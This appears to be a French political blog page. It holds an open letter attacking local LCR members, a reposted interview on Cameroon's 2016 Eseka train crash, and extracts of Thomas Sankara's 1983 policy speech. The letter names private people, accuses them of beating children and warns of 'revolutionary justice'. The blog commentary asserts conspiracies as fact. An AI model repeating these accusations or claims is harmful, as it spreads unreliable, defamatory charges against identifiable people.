On retrouve, là, la technique Truong 1988, la technique Delahaye 1991-2008 : pourrir la vie des adversaires politiques en manipulant l'administration pour casser leur avenir professionnel.
On retrouve, là, les manœuvres crapuleuses de la formoisie, de la classe formoisie.
De cette responsabilité directe de la LCR dans ces crapuleries, votre organisation aura à rendre compte. Des violences de votre sympathisante Mélanie V., elle aura, elle-même, à rendre compte à la justice révolutionnaire, (qu'elle fasse construire c'est une chose, qu'elle fasse des heures sup., c'est une chose, mais qu'elle cogne son aîné et qu'elle s'en vante pour refuser se soutenir Julie Amadis c'en est une autre !!!). De ces violences, le père de ces enfants aura lui aussi à rendre compte, ainsi que les professeurs du collège Varlin, témoins de ses propos, ce jour-là, qui ne firent pas un signalement, ainsi que la professeur témoin, ce jour-là qui revendiqua, elle aussi, taper ses propres enfants.
La base sociale de la LCR est devenue, partiellement, un groupe de cogneurs d'enfants protégés par un candidat magouilleur et insidieux.
De cela, vous aurez à rendre compte - politiquement.
La population locale a commencé à ouvrir les yeux sur ce que vous êtes, sur ce qu'est la LCR locale.
En effet, votre candidat, François Leroux, le protecteur de Mélanie V., a réussi un exploit peu ordinaire : lors des dernières élections municipales de 2008, il a réussi à DIVISER PAR 4 le score de la LCR de 2007. Des voix que Besancenot a obtenues aux élections présidentielles, il en a perdu les TROIS QUARTS.
Je ne pense pas que ces trois quarts d'électeurs savent que vous protégez les cogneurs d'enfants, je ne pense pas qu'ils savent que vous soutenez l'administration qui licencie ceux qui signalent les brutes.
Le jour où la population lira ce texte, saura la vérité sur cela, votre score vous permettra de récupérer tous les cogneurs d'enfants de la ville !
Lorsque je te fis pars, sur un trottoir du centre ville, de cette affaire, ta réaction unique fut de critiquer le fait que j'avais publié le nom de Véronique Combret - la brute - sur mon blog.
Pas un mot de soutien pour les enfants. Pas un mot de critique contre les brutes.
Toi-même, tu n'es pas très net sur cette affaire, toi-même, tu as à clarifier ta position concernant les violences que les enfants subissent, les coups qu'ils se prennent sur la figure et ailleurs, sur les fessées infligées par les sympathisants de ton organisation.
L'air mi-gêné mi-réjoui, tu as osé nous dire : "Je ne partage pas vos méthodes" et "Vous allez vous en prendre plein la gueule".
Mais ce furent tes dernières paroles.
Sur cet augure de Pythie, tu poursuivis ton chemin sans oser nous donner davantage de détails sur les manœuvres de couloir dont tu pouvais avoir été informé.
Sur la cabale démarrée en janvier 1988 par Jacques Truong (ex chef du SO LCR des années 70), sur les manœuvres de son neveu devenu votre leader - minable - local, François Leroux qui réussi à démolir la JCR et à diviser votre score électoral par 4, sur les manœuvres des Delahaye et Dutilloy et de leurs réseaux hueurs, nous aurons la patience d'attendre qu'une justice révolutionnaire vienne y mettre la lumière. Vos militants et ex-militants sont pour une bonne part de puantes crapules dénuées de scrupules.
Tout cela n'a rien d'étonnant : vos sympathisants - tel le Truong - sont devenus, aussi, les militants d'un parti colonialiste tel que le PS et ses tendances filochardes et formoises.
Revendiquer l'inégalité salariale, revendiquer les privilèges de la formoisie, cogner les gamins comme méthode pédagogique, magouiller dans les couloirs avec l'administration et les représentants de la classe bourgeoise, tout cela est caractéristique de la classe formoise.
Ta classe conserve les méthodes de la formoisie chinoise des Lettrés : eux magouillaient dans les couloirs avec la classe féodale et cognaient aussi. Ta classe conserve les méthodes des scribes égyptiens.
Continuité au travers des siècles d'une classe de perroquets répétants dont le seul mérite est d'avoir accumulé un savoir.

LA FORMOISIE, BOURDIEU, PASSERON, BAUDELOT, ESTABLET

Pendant ces treize années tu as eu l'occasion de connaître les concepts de formoisie et d'innovoisie.
C'est de cela que je vais protester publiquement.

Hier soir, lorsque je t'expliquais - passant devant le bar où tu te trouvais-, que j'étais totalement pour la suppression des RASED et pour l'unification de tous les statuts enseignants.
Et que la formoisie qui avait le culot de laisser les jeunes gagner 534 euros par mois sans broncher était un peu gonflée de venir pleurer pour ses avantages.
D'autant plus que les RASED avaient pour conséquence scandaleuse de stigmatiser les malheureux enfants "signalés".

C'est alors que, une nouvelle fois, ta réponse - de parfaite mauvaise foi - fut le fait que "la formoisie", ce n'était pas moi qui l'avait inventée mais Bourdieu.
Tu avais déjà fait ce type de remarque absurde.
Mais pas devant un public.
Alors, je vais te remettre les idées en place : Lorsqu'on critique quelqu'un sur le plan politique, on le fait de bonne foi, avec de la documentation, des faits, des écrits, des citations, et des arguments, des relations causales.
Il n'existe aucun endroit où Bourdieu aurait utilisé des schémas économiques marxistes pour déterminer le fait que les détenteurs du capital formation seraient des exploiteurs.
Malheureusement.
Que ce soit Lénine en philosophie ou Newton en physique, il m'est toujours plus facile de mener mon combat en utilisant une redoute, un poste de combat construit par un grand ancien.
Lorsque je découvris que le combat pour les nombres entiers que je menais depuis trois ans était le même combat que Puthgoras-Pythagore avait mené il y a 2500 ans, je me suis empressé de me retrancher derrière ses fortifications, en reprenant ses arguments, en les actualisant.
Si quelqu'un me trouvait des brouillons où Bourdieu aurait utilisé le terme de CLASSE EXPLOITEUSE concernant les diplômés, cela me permettrait de mener encore plus facilement mon combat : y compris contre les gens - comme toi - qui refusent le SALAIRE ÉGAL POUR TOUS.

Car c'est bien de cela qu'il s'agit : de la deuxième révolution qui sera nécessaire après le renversement du capitalisme.
Quand bien même Bourdieu aurait conceptualisé l'existence d'une classe exploiteuse basée sur son appropriation privée des différentiels de productivité, le sujet ne serait pas épuisé : le principal objet de mes recherches ne fut pas là, il porta sur les conséquences historiques de l'existence de cette classe - dont les principales furent les trahisons sociales démocrates et staliniennes.
Et surtout, pour l'avenir sur les conséquences stratégiques : le fait que le schéma de Trotsky sur la révolution permanente était d'une actualité fondamentale.
Mais au lieu d'une révolution anti-féodale qui devait transcroître en révolution anticapitaliste, ce que Trotsky et Parvus-Helphand avaient compris dès 1905, il s'agit maintenant de prévoir, et d'organiser, une révolution anticapitaliste qui va transcroître en révolution anti-formoise.

Si tu trouvais le moindre millimètre de ligne sur cette perspective et sur cette stratégique d'un nouveau parti révolutionnaire chez Bourdieu, tu ne peux pas imaginer à quel point cela favoriserait mes plans.

Mais tu sais parfaitement que ce n'est pas la peine que tu perdes le moindre temps à rechercher les traces du concept de révolution permanente actualisé chez Bourdieu.
L'argument recuit que tu as utilisé hier soir avait simplement la fonction de noyer le poisson, de donner au public l'impression que tu connaissais le sujet, que tu avais des arguments.
Je trouve ce type de méthode méprisable et indigne de la belle intelligence que tu possèdes encore.

POST-SCRIPTUM

Pour être rapidement retourné lire, par curiosité et en vue de ton édification et de ton éducation marxiste, les œuvres de Bourdieu, Baudelot et Establet, je peux te faire un rapide rappel.
Bourdieu est, un peu, intéressant sur les mécanismes de reproduction de la classe formoise. Mais il ne comprend pas compte
1° qu'il s'agit d'une classe au sens marxiste
2° que cette classe est une classe exploiteuse au sens marxiste.
Les plus intéressant sont Baudelot et Establet ?.
Il faut décortiquer toutes leurs statistiques : ils appellent "petite bourgeoisie" -qu'ils quantifient à trois millions de membres - une addition de haute et moyenne formoisie (deux millions) et de véritable petite-bourgeoisie (un million en 1968) - petite-bourgeoisie véritable qui possède ses outils de production (machines, terre, outils, boutiques etc)
Ils ne se rendent pas compte que leur prolétariat est de la petite et moyenne formoisie qui exploite déjà le tiers monde et qui va laisser la guerre d'Algérie écraser les véritables prolétaires : nos cousins algériens.
Le formariat algérien est formé de salariés et de petits paysans - ouvriers agricoles ou non.
De, cela, il faudra reprendre toute l'étude !
(Y compris sur les plus pauvres des salariés français qui étaient peut-être sous le seuil du PIB mondial)
==
Dans le livre de Baudelot et Establet, "La petite bourgeoisie en France", il y a une intéressante citation de Lénine

On appelle classes de vastes groupes d'hommes qui se distinguent par la place qu'ils occupent dans un système historiquement défini de production sociale, par leur rapport (la plupart du temps fixé et consacré par les lois) vis-à-vis des moyens de production, par leur rôle dans l'organisation sociale du travail, donc, par les modes d'obtention et l'importance de la part de richesses sociales dont ils disposent.

(Lénine, La Grande Initiative, juin 1919, tome 29, p. 425.)

==

Dommage pour eux que Lénine ne me donne raison en laissant définir la formoisie comme un vaste groupe d'homme détenant un capital formation, ayant une productivité supérieure, et s'accaparent égoïstement un volume qu'ils prétendent être les fruits de leur productivité supérieure.
Baudelot et Establet confondent base sociale du PCF et classe sociale.
Leurs recherches n'ont, en conséquence, quasiment rien apporté au combat de classe contre la classe capitaliste, la classe formoisie, ni, donc, contre la clase innovoise.

LIRE AUSSI

LUNDI 22 FÉVRIER 2010


          Réquisitoire implacable contre l'assassin esclavagiste Bolloré par Jean-Marc Bikoko président de la Centrale syndicale du secteur public,   

par Yanick Toutain
REVACTU
25/10/2016

Jean-Marc Bikoko. De mon point de vue, la responsabilité de la compagnie Camrail et donc du Groupe Bollore Logistics, dans cette catastrophe, est entière. Elle se situe à trois niveaux. Sa première responsabilité réside dans la non modernisation des chemins de fer camerounais après la concession en 1999 et leur maintien dans les normes coloniales. (..) Sa deuxième responsabilité réside dans la vétusté et le mauvais état du matériel roulant dont la maintenance ne serait pas rigoureuse. Certaines sources évoquent à propos de cet accident « les freins du train qui auraient lâché ». Le conducteur du train aurait appelé la gare pour le signaler. Certains survivants parmi les passagers affirment d’ailleurs avoir été surpris de voir le train rouler subitement à vive allure y compris dans les virages, suite à de fortes odeurs de brûlé et des bruits bizarres. La troisième responsabilité réside dans la surcharge organisée par les responsables de Camrail qui, sous le prétexte de satisfaire la masse des passagers désemparés par la rupture de l’axe lourd Yaoundé-Douala et de permettre à plusieurs d’entre eux de rallier Douala, ont décidé de faire passer leur offre habituelle de 740 sièges à 1224 sièges le 21 octobre.



LIRE AUSSI

AMEDI 22 OCTOBRE 2016



Samedi, ils sont 80 bébés à être morts au Cameroun. Mais peut-être est-ce 207.
Samedi ils sont 30 enfants de plus de 1 an à être morts au Cameroun. Mais peut-être est-ce 133 ?
Samedi ce sont donc plus de 110 enfants à avoir trouvé la mort dans le Cameroun de Biya et Bolloré.
Mais peut-être, selon l'UNICEF, le total était-il de 340 ?
340 enfants morts que les 79 voyageurs morts exceptionnellement ont accompagné dans la tombe.
La tombe esclavagiste Franceàfric confectionnée depuis l'Elysée,.... et depuis la Suisse, où le roi du pays trouve plus agréable de se trouver..... loin des esclaves qu'il a mission de garder.
Et loin de Boko Haram que ses maitres ont envoyé pour mater ces esclaves et saboter la révolution camerounaise qui arrivait.
Les morts de samedi seront peut-être la circonstance qui va unifier les Camerounais pour les inciter à construire des CDR et à renverser la démocratie.
On va peut-être voir les Camerounais se grouper par 25 pour désigner délégués de base, et construire une pyramide de délégués pour prendre le pouvoir
Avec 400 000 délégateurs derrière chaque délégué national du futur CNRC, comité national de la révolution camerounaise.
Héritière victorieuse de la Guerre 1954-1962
A lire les propos de JM Bikoko, on peut supposer que cette révolution est proche !

ENTRETIEN RÉALISÉ PAR ROSA MOUSSAOUI
DIMANCHE, 23 OCTOBRE, 2016

cameroun.jpg


Pour Jean-Marc Bikoko "la responsabilité de la compagnie Camrail et donc du Groupe Bollore Logistics, dans cette catastrophe, est entière."

Photo : Stringer/AFP
Président de la Centrale syndicale du secteur public, Jean-Marc Bikoko revient sur la catastrophe ferroviaire d’Eseka, qui a fait au moins 75 morts et plus de 600 blessés, le 21 octobre. Pour ce syndicaliste, le bilan de la privatisation des chemins de fer au Cameroun est négatif.
Quelle est la  responsabilité de la compagnie Camrail, filiale du groupe Bollore Africa Logistics, dans la catastrophe ferroviaire qui endeuille le Cameroun ?
Jean-Marc Bikoko. De mon point de vue, la responsabilité de la compagnie Camrail et donc du Groupe Bollore Logistics, dans cette catastrophe, est entière. Elle se situe à trois niveaux. Sa première responsabilité réside dans la non modernisation des chemins de fer camerounais après la concession en 1999 et leur maintien dans les normes coloniales. En effet, les voies du réseau ferroviaire camerounais sont très étroites, très loin des standards internationaux. Alors que l’écartement conventionnel conforme à la convention de Berne du 10 Mai 1886 est de 1,435 m (1435 mm), l’écartement du rail au Cameroun est de 1000 mm. Au vu de l’étroitesse de la voie, il va de soi que la vitesse des trains est extrêmement réduite, ce qui justifie la durée assez longue des voyages. La durée du trajet Yaoundé-Ngaoundéré long de 653 km est de 15 à 20 heures, tandis que celle du trajet Douala-Yaoundé long de 265 km est de 5 heures. Sa deuxième responsabilité réside dans la vétusté et le mauvais état du matériel roulant dont la maintenance ne serait pas rigoureuse. Certaines sources évoquent à propos de cet accident « les freins du train qui auraient lâché ». Le conducteur du train aurait appelé la gare pour le signaler. Certains survivants parmi les passagers affirment d’ailleurs avoir été surpris de voir le train rouler subitement à vive allure y compris dans les virages, suite à de fortes odeurs de brûlé et des bruits bizarres. La troisième responsabilité réside dans la surcharge organisée par les responsables de Camrail qui, sous le prétexte de satisfaire la masse des passagers désemparés par la rupture de l’axe lourd Yaoundé-Douala et de permettre à plusieurs d’entre eux de rallier Douala, ont décidé de faire passer leur offre habituelle de 740 sièges à 1224 sièges le 21 octobre.
La compagnie va-t-elle assumer ses responsabilités vis-à-vis des victimes ?
Jean-Marc Bikoko. Compte tenu de tout ce qui précède, Camrail devrait assumer ses responsabilités. Un communiqué de l’entreprise va dans ce sens. Il indique qu’une enquête est en cours et que la compagnie « met en œuvre tous les moyens nécessaires (...) afin de prendre en charge les personnes blessées et d'assurer un soutien aux familles touchées par ce drame ».
Quel est le bilan de la privatisation des chemins de fer au Cameroun ?
Jean-Marc Bikoko. Le bilan de la privatisation des chemins de fer du Cameroun est globalement négatif. Avec Bolloré Africa Logistics comme actionnaire de référence, Camrail exploite le réseau ferroviaire du Cameroun depuis ler avril 1999 dans le cadre d'un contrat de concession signé avec l'État du Cameroun. Dix-sept ans plus tard, aucune des missions dévolues à L'Office du chemin de fer transcamerounais en termes de travaux de construction et de renouvellement des infrastructures n’a été réalisée. Les Camerounais aimeraient savoir combien de nouveaux bâtiments ont été construits, combien d'extensions ont été mises en place par Camrail, pourquoi l’écartement du rail camerounais est resté celui de l’époque coloniale. Le groupe Bolloré Africa Logistics a juste réorganisé le transport des marchandises et des personnes, rationalisé la gouvernance financière de l’ancienne Regifercam, importé de vieilles locomotives d’Amérique du nord qui correspondent à l’écartement du rail au Cameroun et repeint les vieux wagons existant. Au vu et au su de tout le monde, avec la complicité des gouvernants actuels du Cameroun.

Journaliste à la rubrique Monde

          CDR et CNR dans le DOP 83 Discours d'Orientation Politique prononcé par Thomas Sankara le 2 octobre 1983 sur rédaction Valère Somé   



sélection des extraits par Yanick Toutain
REVACTU
15/6/2016



Le Conseil national de la révolution, qui est dans le processus révolutionnaire déclenché depuis le 4 août le pouvoir de conception, de direction, et de contrôle de la vie nationale tant sur le plan politique, économique que social, se doit d’avoir des instances locales dans les divers secteurs de la vie nationale.
Et c’est là que réside le sens profond de la création des CDR qui sont les représentants du pouvoir révolutionnaire dans les villages, les quartiers des villes, les lieux de travail.

Les CDR constituent l’organisation authentique du peuple dans l’exercice du pouvoir révolutionnaire. C’est l’instrument que le peuple s’est forgé pour se rendre véritablement souverain de son destin et étendre de ce fait son contrôle dans tous les domaines de la société. Les armes du peuple, le pouvoir du peuple, les richesses du peuple, ce sera le peuple qui les gérera et les CDR sont là pour cela.

Quant à leurs rôles, ils sont immenses et diversifiés. Leur mission première est l’organisation du peuple voltaïque tout entier en vue de l’engager dans le combat révolutionnaire.
Le peuple ainsi organisé dans les CDR acquiert non seulement le droit de regard sur les problèmes de son devenir, mais aussi participe à la prise de décision sur son devenir et à son exécution.
La révolution comme théorie juste pour détruire l’ordre ancien et, en lieu et place, édifier une société d’un type nouveau ne saurait être menée que par ceux qui y ont intérêt.


Les CDR sont alors les détachements d’assaut qui s’attaqueront à tous les foyers de résistance.
Ce sont les bâtisseurs de la Haute-Volta révolutionnaire. Ce sont les levains qui devront porter la révolution dans toutes les provinces, tous nos villages, tous les services publics et privés, tous les foyers, tous les milieux.
Pour ce faire, les militants révolutionnaires au sein des CDR doivent rivaliser d’ardeur dans les tâches primordiales suivantes :

1°) L’action en direction des membres du CDR : il revient aux militants révolutionnaires le travail d’éducation politique de leurs camarades. Les CDR doivent être des écoles de formation politique. Les CDR sont les cadres adéquats où les militants discutent des décisions des instances supérieures de la révolution, du CNR et du gouvernement.

2°) L’action en direction des masses populaires vise à les entraîner à adhérer massivement aux objectifs du CNR par une propagande et une agitation intrépides et sans relâche. A la propagande et aux calomnies mensongères de la réaction, les CDR doivent savoir opposer une propagande, une explication révolutionnaires appropriées selon le principe que seule la vérité est révolutionnaire.

Les CDR se doivent d’être à l’écoute des masses afin de se rendre compte de leur état d’esprit, de leurs besoins, pour en informer à temps le CNR et faire à ce sujet des propositions concrètes. Ils sont invités à examiner les questions touchant l’amélioration des intérêts des masses populaires, en soutenant les initiatives prises par ces dernières.

Le contact direct avec les masses, populaires, par l’organisation périodique des assemblées ouvertes où sont discutées les questions qui les intéressent, est une nécessité impérieuse pour les CDR s’ils veulent aider à l’application correcte des directives du CNR. Ainsi, dans l’action de propagande, les décisions du CNR seront expliquées aux masses. Seront aussi expliquées toutes les mesures destinées à l’amélioration de leurs conditions de vie. Les CDR doivent lutter avec les masses populaires des villes et des campagnes contre leurs ennemis et l’adversité de la nature, pour la transformation de leur existence matérielle et morale.
TEXTE INTEGRAL

AMEDI 27 FÉVRIER 2016


2 OCTOBRE 15 OCTOBRE 30 OCTOBRE JOURNEES DES IMPOSTEURS ANTI CDR



Le 15 octobre vient de se terminer dans l'imposture la plus totale. Les médias Franceàfric n'ont fait que relayer les voyous, les bandits, les imposteurs, les Balais à Chiottes, les Smockey, les ennemis de Sankara, les ennemis du CNR, les ennemis des CDR
Le 15 octobre est devenu journée des impostures, journée des imposteurs.
Alors que Thomas et le jeune Valère mettaient les CDR au coeur de leur programme, les imposteurs réinventent un FAUX SANKARA....

LES prétendus "HERITIERS DE THOMAS SANKARA" VOUENT UNE HAINE SANS LIMITE AU VERITABLE SANKARA ET A SON OEUVRE CDR CNR

Un Sankara de Disneyland.... Un Sankara qui a autant de rapport avec le vrai que les tee-shirts Che Guevara n'ont de rapport avec le révolutionnaire qui voulait l'égalisme pour les peuples martyrs de l'impérialisme. Les Smockey, petits engins téléguidés des manipulations contre-révolutionnaires de l'Elysée et des assassins DGSE donneurs d'ordre ont fait leur 15 octobre.
Une icône En quatre ans, le « Che Guevara africain » a su définir un système basé sur la valorisation et la consommation des produits locaux.  La probité exemplaire de Sankara et les circonstances de sa mort, ont fait de lui une icône sur le continent. Tous ceux qui se réclament de son héritage exigent la justice, d’où le symposium du 2 octobre dernier, en prélude à la construction du mémorial Thomas Sankara, qui a réuni à Ouagadougou plus de 3 000 jeunes venus du Burkina et de la sous-région, appelés les « Héritiers de Thomas Sankara ». « Nous ne réclamons pas la justice, nous l’exigeons, parce que Thomas est mort pour nous », a lancé Fadel Baro, leader du mouvement sénégalais « Y’en a marre », lors du rassemblement.(auteur de ce torchon puant de mensonge :Boubacar Sangaré)

Ce Fadel Baro alter ego corrompu de l'ambassade US à Dakar a vu ses maitres mettre en ligne le montant de la corruption
Le présenter comme "Les Héritiers de Thomas Sankara" est carrément de la complicité d'entreprise terroriste francàfric.
Du blanchiement de constitution sanglante.

15 octobre de mensonges, de baratins.... surtout de CAMOUFLAGE du DOP
Le 15 octobre est le principal jour de CAMOUFLAGE du DOP
Même son auteur Valère Somé participe au CAMOUFLAGE DU DOP
Le Vieux Valère Somé renie l'anticapitaliste jeune Valère Somé.
Le Vieux Valère Somé renie sa propre jeunesse.
Voici donc les extraits les plus pertinents pour que le Burkina Faso retrouve ses institutions.






Extraits du Discours d’orientation politique du 2 octobre 1983 prononcé par Thomas Sankara sur un texte rédigé par Valère Somé

Peuple de Haute-Volta, [Le pays ne s'appelait pas encore Burkina Faso]
Camarades militantes et militants de la révolution :


Notre peuple a subi l’épreuve de luttes héroïques et a enfin remporté la victoire dans la nuit devenue désormais historique du 4 août 1983. Cela fera bientôt deux mois que la révolution est en marche irréversible dans notre pays. Deux mois que le peuple combattant de Haute-Volta s’est mobilisé comme un seul homme derrière le Conseil national de la révolution (CNR) pour l’édification d’une société voltaïque nouvelle, libre, indépendante et prospère ; une société nouvelle débarrassée de l’injustice sociale, débarrassée de la domination et de l’exploitation séculaires de l’impérialisme international.


L’insurrection du 4 août 1983, la victoire de la révolution et l’avènement du Conseil national de la révolution sont donc incontestablement la consécration et l’aboutissement conséquent des luttes du peuple voltaïque contre la domination et l’exploitation néocoloniales, contre l’assujettissement de notre pays, pour l’indépendance, la liberté, la dignité et le progrès de notre peuple. En cela, les analyses simplistes et superficielles, cantonnées dans la reproduction des schémas préétablis, ne pourront rien changer à la réalité des faits.
La révolution d’août a triomphé en se posant ainsi comme l’héritière et l’approfondissement du soulèvement populaire du 3 janvier 1966. Elle est la poursuite et le développement à un stade qualitatif supérieur de toutes les grandes luttes populaires qui sont allées en se multipliant ces dernières années et qui toutes, marquaient le refus systématique du peuple voltaïque et particulièrement de la classe ouvrière et des travailleurs de se laisser gouverner comme avant. Les jalons les plus marquants et les plus significatifs de ces grandes luttes populaires correspondent aux dates de décembre 1975, de mai 1979, d’octobre et novembre 1980, d’avril 1982 et de mai 1983.


L’adhésion enthousiaste des larges masses populaires à la révolution d’août est la traduction concrète de l’espoir immense que le peuple voltaïque fonde sur l’avènement du CNR pour qu’enfin puisse être réalisée la satisfaction de son aspiration profonde à la démocratie, à la liberté et à l’indépendance, au progrès véritable, à la restauration de la dignité et de la grandeur de notre patrie, que 23 années de régime néo-coloniale ont singulièrement bafouée.

Que tous ceux qui ont pris fait et cause pour la révolution d’août se pénètrent de la ligne directrice ainsi dégagée en vue de pouvoir assumer leur rôle de révolutionnaires conscients et, en véritables propagandistes intrépides et infatigables, en fassent une diffusion au sein des masses.


Il ne suffit plus de se dire révolutionnaire, il faut en plus se pénétrer de la signification profonde de la révolution dont on est le fervent défenseur. C’est le meilleur moyen de mieux la défendre contre les attaques et les défigurations que les contre-révolutionnaires ne manqueront pas de lui opposer. Savoir lier la théorie révolutionnaire à la pratique révolutionnaire sera le critère décisif permettant désormais de distinguer les révolutionnaires conséquents de tous ceux qui accourent à la révolution mus par des mobiles étrangers à la cause révolutionnaire.

De la souveraineté du peuple dans l’exercice du pouvoir révolutionnaire
Un des traits distinctifs de la révolution d’août, avons-nous dit, et qui lui confère son caractère populaire, c’est qu’elle est le mouvement de l’immense majorité au profit de l’immense majorité.
C’est une révolution faite par les masses populaires voltaïques elles-mêmes avec leurs mots d’ordre et leurs aspirations. L’objectif de cette révolution consiste à faire assumer le pouvoir par le peuple. C’est la raison pour laquelle le premier acte de la révolution, après la Proclamation du 4 août, fut l’appel adressé au peuple pour la création des Comités de défense de la révolution (CDR). Le CNR a la conviction que pour que cette révolution soit véritablement populaire, elle devra procéder à la destruction de la machine d’État néo-coloniale et organiser une nouvelle machine capable de garantir la souveraineté du peuple. La question de savoir comment ce pouvoir populaire sera exercé, comment ce pouvoir devra s’organiser, est une question essentielle pour le devenir de notre révolution.
L’histoire de notre pays jusqu’à nos jours a été essentiellement dominée par les classes exploiteuses et conservatrices qui ont exercé leur dictature anti-démocratique et anti-populaire, par leur mainmise sur la politique, l’économie, l’idéologie, la culture, l’administration et la justice.
La révolution a pour premier objectif de faire passer le pouvoir des mains de la bourgeoisie voltaïque alliée à l’impérialisme aux mains de l’alliance des classes populaires constituant le peuple. Ce qui veut dire qu’à la dictature anti-démocratique et anti-populaire de l’alliance réactionnaire des classes sociales favorables à l’impérialisme, le peuple au pouvoir devra désormais opposer son pouvoir démocratique et populaire.
Ce pouvoir démocratique et populaire sera le fondement, la base solide du pouvoir révolutionnaire en Haute-Volta. Elle aura pour tâche primordiale la reconversion totale de toute la machine d’État avec ses lois, son administration, ses tribunaux, sa police, son armée qui avaient été façonnés pour servir et défendre les intérêts égoïstes des classes et couches sociales réactionnaires. Elle aura pour tâche d’organiser la lutte contre les menées contre-révolutionnaires de reconquête du « paradis perdu » en vue d’écraser complètement la résistance des réactionnaires nostalgiques du passé. Et c’est là que résident la nécessité et le rôle des CDR, comme point d’appui des masses populaires à l’assaut des citadelles réactionnaires et contre-révolutionnaires.
Pour une juste compréhension de la nature, du rôle et du fonctionnement des CDR
L’édification de d’État de démocratie populaire qui est l’objectif final de la révolution d’août n’est pas et ne sera pas l’oeuvre d’un seul jour. C’est une tâche ardue qui exigera de nous des sacrifices énormes. Le caractère démocratique de cette révolution nous impose une décentralisation et une déconcentration du pouvoir administratif afin de rapprocher l’administration du peuple, afin de faire de la chose publique une affaire qui intéresse tout un chacun. Dans cette oeuvre immense de longue haleine, nous avons entrepris de remodeler la carte administrative du pays pour une plus grande efficacité.
Nous avons aussi entrepris de renouveler la direction des services administratifs dans un sens plus révolutionnaire. En même temps, nous avons « dégagé » des fonctionnaires et militaires qui, pour des raisons diverses, ne peuvent suivre la cadence de la présente révolution. Il nous reste beaucoup à faire et nous en sommes conscients.
Le Conseil national de la révolution, qui est dans le processus révolutionnaire déclenché depuis le 4 août le pouvoir de conception, de direction, et de contrôle de la vie nationale tant sur le plan politique, économique que social, se doit d’avoir des instances locales dans les divers secteurs de la vie nationale. Et c’est là que réside le sens profond de la création des CDR qui sont les représentants du pouvoir révolutionnaire dans les villages, les quartiers des villes, les lieux de travail.
Les CDR constituent l’organisation authentique du peuple dans l’exercice du pouvoir révolutionnaire. C’est l’instrument que le peuple s’est forgé pour se rendre véritablement souverain de son destin et étendre de ce fait son contrôle dans tous les domaines de la société. Les armes du peuple, le pouvoir du peuple, les richesses du peuple, ce sera le peuple qui les gérera et les CDR sont là pour cela.
Quant à leurs rôles, ils sont immenses et diversifiés. Leur mission première est l’organisation du peuple voltaïque tout entier en vue de l’engager dans le combat révolutionnaire. Le peuple ainsi organisé dans les CDR acquiert non seulement le droit de regard sur les problèmes de son devenir, mais aussi participe à la prise de décision sur son devenir et à son exécution. La révolution comme théorie juste pour détruire l’ordre
ancien et, en lieu et place, édifier une société d’un type nouveau ne saurait être menée que par ceux qui y ont intérêt.
Les CDR sont alors les détachements d’assaut qui s’attaqueront à tous les foyers de résistance. Ce sont les bâtisseurs de la Haute-Volta révolutionnaire. Ce sont les levains qui devront porter la révolution dans toutes les provinces, tous nos villages, tous les services publics et privés, tous les foyers, tous les milieux. Pour ce faire, les militants révolutionnaires au sein des CDR doivent rivaliser d’ardeur dans les tâches primordiales suivantes :
1°) L’action en direction des membres du CDR : il revient aux militants révolutionnaires le travail d’éducation politique de leurs camarades. Les CDR doivent être des écoles de formation politique. Les CDR sont les cadres adéquats où les militants discutent des décisions des instances supérieures de la révolution, du CNR et du gouvernement.
2°) L’action en direction des masses populaires vise à les entraîner à adhérer massivement aux objectifs du CNR par une propagande et une agitation intrépides et sans relâche. A la propagande et aux calomnies mensongères de la réaction, les CDR doivent savoir opposer une propagande, une explication révolutionnaires appropriées selon le principe que seule la vérité est révolutionnaire.
Les CDR se doivent d’être à l’écoute des masses afin de se rendre compte de leur état d’esprit, de leurs besoins, pour en informer à temps le CNR et faire à ce sujet des propositions concrètes. Ils sont invités à examiner les questions touchant l’amélioration des intérêts des masses populaires, en soutenant les initiatives prises par ces dernières.
Le contact direct avec les masses, populaires, par l’organisation périodique des assemblées ouvertes où sont discutées les questions qui les intéressent, est une nécessité impérieuse pour les CDR s’ils veulent aider à l’application correcte des directives du CNR. Ainsi, dans l’action de propagande, les décisions du CNR seront expliquées aux masses. Seront aussi expliquées toutes les mesures destinées à l’amélioration de leurs conditions de vie. Les CDR doivent lutter avec les masses populaires des villes et des campagnes contre leurs ennemis et l’adversité de la nature, pour la transformation de leur existence matérielle et morale.
3°) Les CDR devront travailler de manière rationnelle illustrant ainsi un des traits de notre révolution : la rigueur. Par conséquent, ils doivent se doter de plans d’action cohérents et ambitieux qui s’imposent à tous leurs membres.
Depuis le 4 août, date devenue désormais historique pour notre peuple, répondant à l’appel du CNR, les Voltaïques ont développé des initiatives pour se doter de CDR. Ainsi des CDR virent le jour dans les villages, dans les quartiers des villes, bientôt sur les lieux de travail, dans les services, dans les usines, au sein de l’armée. Tout ceci est le résultat de l’action spontanée des masses. Il convient maintenant de travailler à leur structuration interne sur une base claire, et à leur organisation à l’échelle nationale. C’est ce à quoi s’attelle actuellement le Secrétariat général national des CDR. En attendant que des travaux de réflexions qui se mènent actuellement sur la base des expériences déjà accumulées, sortent des résultats définitifs, nous nous contenterons d’esquisser le schéma et les principes directeurs généraux du fonctionnement des CDR.
L’idée première poursuivie avec la création des CDR consiste en la démocratisation du pouvoir. Les CDR devenant ainsi des organes par lesquels le peuple exerce le pouvoir local découlant du pouvoir central dévolu au CNR.
Le CNR constitue, en dehors des assises du congrès national, le pouvoir suprême. Il est l’organe directeur de tout cet édifice dont le principe directeur est le centralisme démocratique.
Le centralisme démocratique est basé d’une part sur la subordination des organes de l’échelon inférieur aux organismes de l’échelon supérieur dont le plus haut est le CNR auquel se subordonnent toutes les organisations. D’autre part, ce centralisme reste démocratique, car le principe électif est de rigueur à tous les niveaux et l’autonomie des organes locaux est reconnue pour toutes les questions relevant de leur ressort, toutefois dans les limites et le respect des directives générales tracées par l’instance supérieure.

De la moralité révolutionnaire au sein des CDR
La révolution vise à la transformation de la société sous tous les rapports, économiques, sociaux et culturels. Elle vise à créer un Voltaïque nouveau, avec une moralité et un comportement social exemplaires qui inspirent l’admiration et la confiance des masses. La domination néo-coloniale a placé notre société dans un pourrissement tel qu’il nous faudra des années pour la purifier.
Cependant les militants des CDR doivent se forger une nouvelle conscience et un nouveau comportement en vue de donner le bon exemple aux masses populaires. En faisant la révolution, nous devons veiller à notre propre transformation qualitative. Sans une transformation qualitative de ceux-là mêmes qui sont censés être les artisans de la révolution, il est pratiquement impossible de créer une société nouvelle débarrassée de la corruption, du vol, du mensonge, et de l’individualisme de façon générale.
